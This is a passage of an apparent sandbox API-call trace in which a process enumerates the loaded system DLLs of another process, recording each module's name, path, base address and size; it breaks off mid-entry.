[0047.611] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6fa0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AUDIOSES.DLL" (normalized: "c:\\windows\\system32\\audioses.dll")) returned 0x20 [0047.617] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6f90000, lpmodinfo=0x265b970, cb=0x18 | out: lpmodinfo=0x265b970*(lpBaseOfDll=0x7fef6f90000, SizeOfImage=0xa000, EntryPoint=0x7fef6f949f0)) returned 1 [0047.623] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6f90000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="msacm32.drv") returned 0xb [0047.629] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6f90000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv")) returned 0x1f [0047.637] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6f70000, lpmodinfo=0x265db30, cb=0x18 | out: lpmodinfo=0x265db30*(lpBaseOfDll=0x7fef6f70000, SizeOfImage=0x18000, EntryPoint=0x7fef6f71060)) returned 1 [0047.643] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6f70000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MSACM32.dll") returned 0xb [0047.649] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6f70000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSACM32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll")) returned 0x1f [0047.654] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6f60000, lpmodinfo=0x265fcf0, cb=0x18 | out: lpmodinfo=0x265fcf0*(lpBaseOfDll=0x7fef6f60000, SizeOfImage=0x9000, EntryPoint=0x7fef6f62f98)) returned 1 [0047.661] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6f60000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="midimap.dll") returned 0xb [0047.668] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6f60000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll")) returned 0x1f [0047.675] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbab0000, lpmodinfo=0x2661eb0, cb=0x18 | out: lpmodinfo=0x2661eb0*(lpBaseOfDll=0x7fefbab0000, SizeOfImage=0x43000, EntryPoint=0x7fefbab30d8)) returned 1 [0047.685] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbab0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="stobject.dll") returned 0xc [0047.693] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbab0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll")) returned 0x20 [0047.704] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9f0000, lpmodinfo=0x2664098, cb=0x18 | out: lpmodinfo=0x2664098*(lpBaseOfDll=0x7fefb9f0000, SizeOfImage=0xba000, EntryPoint=0x7fefb9f115c)) returned 1 [0047.729] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9f0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="BatMeter.dll") returned 0xc [0047.740] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9f0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\BatMeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll")) returned 0x20 [0047.763] CoTaskMemFree (pv=0x781780) [0047.763] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb00000, lpmodinfo=0x2477a78, cb=0x18 | out: lpmodinfo=0x2477a78*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0047.774] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb00000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0047.784] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb00000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0047.797] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb910000, lpmodinfo=0x2479c48, cb=0x18 | out: lpmodinfo=0x2479c48*(lpBaseOfDll=0x7fefb910000, SizeOfImage=0x69000, EntryPoint=0x7fefb911198)) returned 1 [0047.808] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb910000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="prnfldr.dll") returned 0xb [0047.819] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb910000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll")) returned 0x1f [0047.830] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb890000, lpmodinfo=0x247be08, cb=0x18 | out: lpmodinfo=0x247be08*(lpBaseOfDll=0x7fefb890000, SizeOfImage=0x71000, EntryPoint=0x7fefb8cecc4)) returned 1 [0047.841] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb890000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WINSPOOL.DRV") returned 0xc [0047.852] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb890000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSPOOL.DRV" (normalized: "c:\\windows\\system32\\winspool.drv")) returned 0x20 [0047.862] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb2a0000, lpmodinfo=0x247dfd8, cb=0x18 | out: lpmodinfo=0x247dfd8*(lpBaseOfDll=0x7fefb2a0000, SizeOfImage=0x67000, EntryPoint=0x7fefb2b6060)) returned 1 [0047.872] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb2a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="es.dll") returned 0x6 [0047.882] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb2a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")) returned 0x1a [0047.897] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6be0000, lpmodinfo=0x2480188, cb=0x18 | out: lpmodinfo=0x2480188*(lpBaseOfDll=0x7fef6be0000, SizeOfImage=0x74000, EntryPoint=0x7fef6c154c8)) returned 1 [0047.908] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6be0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="dxp.dll") returned 0x7 [0047.935] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6be0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dxp.dll" (normalized: "c:\\windows\\system32\\dxp.dll")) returned 0x1b [0047.955] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb870000, lpmodinfo=0x2482338, cb=0x18 | out: lpmodinfo=0x2482338*(lpBaseOfDll=0x7fefb870000, SizeOfImage=0x16000, EntryPoint=0x7fefb871050)) returned 1 [0047.985] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb870000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="Syncreg.dll") returned 0xb [0048.015] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb870000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll")) returned 0x1f [0048.027] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb20000, lpmodinfo=0x24844f8, cb=0x18 | out: lpmodinfo=0x24844f8*(lpBaseOfDll=0x7fefbb20000, SizeOfImage=0xb000, EntryPoint=0x7fefbb21030)) returned 1 [0048.038] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb20000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ehSSO.dll") returned 0x9 [0048.049] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb20000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll")) returned 0x1a [0048.070] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6950000, lpmodinfo=0x24866b0, cb=0x18 | out: lpmodinfo=0x24866b0*(lpBaseOfDll=0x7fef6950000, SizeOfImage=0x28b000, EntryPoint=0x7fef6956f5c)) returned 1 [0048.080] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6950000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="netshell.dll") returned 0xc [0048.108] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6950000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")) returned 0x20 [0048.134] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb270000, lpmodinfo=0x2488880, cb=0x18 | out: lpmodinfo=0x2488880*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0048.157] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb270000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0048.179] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb270000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0048.190] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x248aa50, cb=0x18 | out: lpmodinfo=0x248aa50*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0048.201] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0048.211] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0048.222] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb260000, lpmodinfo=0x248d430, cb=0x18 | out: lpmodinfo=0x248d430*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0048.240] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb260000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0048.274] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb260000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0048.301] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb3f0000, lpmodinfo=0x248f5f0, cb=0x18 | out: lpmodinfo=0x248f5f0*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0048.311] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0048.330] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0048.373] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb860000, lpmodinfo=0x24917b0, cb=0x18 | out: lpmodinfo=0x24917b0*(lpBaseOfDll=0x7fefb860000, SizeOfImage=0x10000, EntryPoint=0x7fefb8695dc)) returned 1 [0048.387] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb860000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="AltTab.dll") returned 0xa [0048.397] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb860000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll")) returned 0x1e [0048.408] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6930000, lpmodinfo=0x2493970, cb=0x18 | out: lpmodinfo=0x2493970*(lpBaseOfDll=0x7fef6930000, SizeOfImage=0x20000, EntryPoint=0x7fef6931298)) returned 1 [0048.418] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6930000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wpdshserviceobj.dll") returned 0x13 [0048.446] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6930000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wpdshserviceobj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll")) returned 0x27 [0048.457] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef68f0000, lpmodinfo=0x2495b50, cb=0x18 | out: lpmodinfo=0x2495b50*(lpBaseOfDll=0x7fef68f0000, SizeOfImage=0x39000, EntryPoint=0x7fef68f1240)) returned 1 [0048.467] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef68f0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="PortableDeviceTypes.dll") returned 0x17 [0048.478] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef68f0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll")) returned 0x2b [0048.490] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef92e0000, lpmodinfo=0x2497d40, cb=0x18 | out: lpmodinfo=0x2497d40*(lpBaseOfDll=0x7fef92e0000, SizeOfImage=0xbd000, EntryPoint=0x7fef92e1ea4)) returned 1 [0048.501] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef92e0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="PortableDeviceApi.dll") returned 0x15 [0048.512] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef92e0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll")) returned 0x29 [0048.523] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x2499f30, cb=0x18 | out: lpmodinfo=0x2499f30*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0048.534] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0048.548] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0048.560] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb4e0000, lpmodinfo=0x249c100, cb=0x18 | out: lpmodinfo=0x249c100*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0048.573] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0048.585] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0048.596] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6730000, lpmodinfo=0x249e2d0, cb=0x18 | out: lpmodinfo=0x249e2d0*(lpBaseOfDll=0x7fef6730000, SizeOfImage=0x1bd000, EntryPoint=0x7fef6731010)) returned 1 [0048.608] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6730000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="pnidui.dll") returned 0xa [0048.619] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6730000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll")) returned 0x1e [0048.645] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6710000, lpmodinfo=0x24a0490, cb=0x18 | out: lpmodinfo=0x24a0490*(lpBaseOfDll=0x7fef6710000, SizeOfImage=0x1f000, EntryPoint=0x7fef6713580)) returned 1 [0048.679] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6710000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="QUtil.dll") returned 0x9 [0048.690] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6710000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\QUtil.dll" (normalized: "c:\\windows\\system32\\qutil.dll")) returned 0x1d [0048.701] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd2a0000, lpmodinfo=0x24a2650, cb=0x18 | out: lpmodinfo=0x24a2650*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0048.714] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0048.726] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0048.737] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac20000, lpmodinfo=0x24a4810, cb=0x18 | out: lpmodinfo=0x24a4810*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0048.751] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac20000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0048.763] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac20000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0048.807] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x24a69e0, cb=0x18 | out: lpmodinfo=0x24a69e0*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0048.818] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0048.829] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0048.907] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac00000, lpmodinfo=0x24a8ba0, cb=0x18 | out: lpmodinfo=0x24a8ba0*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0048.918] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac00000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0048.929] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac00000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0048.943] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa5d0000, lpmodinfo=0x24aad70, cb=0x18 | out: lpmodinfo=0x24aad70*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0048.953] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0048.964] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0048.975] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef64c0000, lpmodinfo=0x24acf40, cb=0x18 | out: lpmodinfo=0x24acf40*(lpBaseOfDll=0x7fef64c0000, SizeOfImage=0x3f000, EntryPoint=0x7fef64c12c0)) returned 1 [0048.986] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef64c0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="cscobj.dll") returned 0xa [0049.024] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef64c0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll")) returned 0x1e [0049.048] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef64a0000, lpmodinfo=0x24af100, cb=0x18 | out: lpmodinfo=0x24af100*(lpBaseOfDll=0x7fef64a0000, SizeOfImage=0x20000, EntryPoint=0x7fef64a1010)) returned 1 [0049.116] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef64a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="Wlanapi.dll") returned 0xb [0049.127] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef64a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")) returned 0x1f [0049.138] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb850000, lpmodinfo=0x24b12d8, cb=0x18 | out: lpmodinfo=0x24b12d8*(lpBaseOfDll=0x7fefb850000, SizeOfImage=0x7000, EntryPoint=0x7fefb851b24)) returned 1 [0049.149] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb850000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wlanutil.dll") returned 0xc [0049.162] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb850000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll")) returned 0x20 [0049.173] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6440000, lpmodinfo=0x24b34a8, cb=0x18 | out: lpmodinfo=0x24b34a8*(lpBaseOfDll=0x7fef6440000, SizeOfImage=0x5e000, EntryPoint=0x7fef647a7fc)) returned 1 [0049.185] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6440000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wwanapi.dll") returned 0xb [0049.197] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6440000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wwanapi.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll")) returned 0x1f [0049.209] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6430000, lpmodinfo=0x24b5668, cb=0x18 | out: lpmodinfo=0x24b5668*(lpBaseOfDll=0x7fef6430000, SizeOfImage=0xd000, EntryPoint=0x7fef6437104)) returned 1 [0049.217] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6430000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wwapi.dll") returned 0x9 [0049.228] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6430000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll")) returned 0x1d [0049.240] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef63e0000, lpmodinfo=0x24b7828, cb=0x18 | out: lpmodinfo=0x24b7828*(lpBaseOfDll=0x7fef63e0000, SizeOfImage=0x45000, EntryPoint=0x7fef63e4190)) returned 1 [0049.251] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef63e0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="QAgent.dll") returned 0xa [0049.266] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef63e0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\QAgent.dll" (normalized: "c:\\windows\\system32\\qagent.dll")) returned 0x1e [0049.278] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6380000, lpmodinfo=0x24b99e8, cb=0x18 | out: lpmodinfo=0x24b99e8*(lpBaseOfDll=0x7fef6380000, SizeOfImage=0x58000, EntryPoint=0x7fef63830f0)) returned 1 [0049.289] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6380000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="srchadmin.dll") returned 0xd [0049.304] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6380000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll")) returned 0x21 [0049.317] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef62c0000, lpmodinfo=0x24bbbb8, cb=0x18 | out: lpmodinfo=0x24bbbb8*(lpBaseOfDll=0x7fef62c0000, SizeOfImage=0xb5000, EntryPoint=0x7fef62e1cd0)) returned 1 [0049.328] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef62c0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="bthprops.cpl") returned 0xc [0049.340] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef62c0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl")) returned 0x20 [0049.349] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef5700000, lpmodinfo=0x24bdd88, cb=0x18 | out: lpmodinfo=0x24bdd88*(lpBaseOfDll=0x7fef5700000, SizeOfImage=0xbb7000, EntryPoint=0x7fef5701bd8)) returned 1 [0049.361] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef5700000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ieframe.dll") returned 0xb [0049.377] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef5700000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")) returned 0x1f [0049.389] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef56a0000, lpmodinfo=0x24bff48, cb=0x18 | out: lpmodinfo=0x24bff48*(lpBaseOfDll=0x7fef56a0000, SizeOfImage=0x54000, EntryPoint=0x7fef56a104c)) returned 1 [0049.401] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef56a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="OLEACC.dll") returned 0xa [0049.412] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef56a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\OLEACC.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")) returned 0x1e [0049.423] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef5470000, lpmodinfo=0x24c2108, cb=0x18 | out: lpmodinfo=0x24c2108*(lpBaseOfDll=0x7fef5470000, SizeOfImage=0x22b000, EntryPoint=0x7fef5471f00)) returned 1 [0049.435] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef5470000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="SyncCenter.dll") returned 0xe [0049.447] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef5470000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll")) returned 0x22 [0049.461] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef53a0000, lpmodinfo=0x24c42d8, cb=0x18 | out: lpmodinfo=0x24c42d8*(lpBaseOfDll=0x7fef53a0000, SizeOfImage=0xc2000, EntryPoint=0x7fef53c04b4)) returned 1 [0049.472] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef53a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="Actioncenter.dll") returned 0x10 [0049.482] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef53a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\Actioncenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll")) returned 0x24 [0049.494] GetModuleInformation (in: 